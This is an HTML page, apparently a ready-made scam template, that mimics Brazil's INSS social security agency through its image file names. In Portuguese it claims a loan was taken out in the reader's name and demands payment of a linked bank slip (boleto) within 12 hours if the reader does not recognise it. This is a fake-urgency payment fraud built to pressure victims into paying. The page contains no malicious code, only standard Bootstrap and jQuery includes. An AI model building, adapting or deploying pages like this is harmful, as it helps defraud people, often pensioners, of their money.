<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

    <title>Hello, world!</title>
  </head>
  <style>
      .main-img{
        background-image: url(mobile-inss.png);
        background-repeat: no-repeat;
        overflow: hidden;
        display: flex;
        width: 100%;
        height: 100%    ;

      }
      .col-12{
          padding: 0;
          margin: 0;
      }
      .row{  
        padding: 0;
        margin: 0;
      }
      .container-fluid{
        padding: 0;
        margin: 0;
      }
      .boleto{
          padding: 30px;
      }
      span{
          font-size: 22px;
      }
    </style>
  <body>
    <div class="container-fluid">
        <div class="row">
            <div class="col-12">
                <img width="100%" src="mobile-inss-logo.png">
            </div>
        </div>
        <div class="row">
            <div class="col-12 boleto">
                <span>
                    Foi feito um <b>empréstimo em seu nome.</b>
                    Caso não reconheça a solicitação do empréstimo
                    faça o pagamento do boleto bancario em até 12 horas. 
                </span>
            </div>
        </div>
        <a href="boleto.png"><div class="row">
            <div class="col-12">
                <img width="100%" src="boleto.png">
            </div>
        </div></a>
        <div class="row">
            <div class="col-12">
                <img width="100%" src="footer.png">
            </div>
        </div>
    </div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>
</html>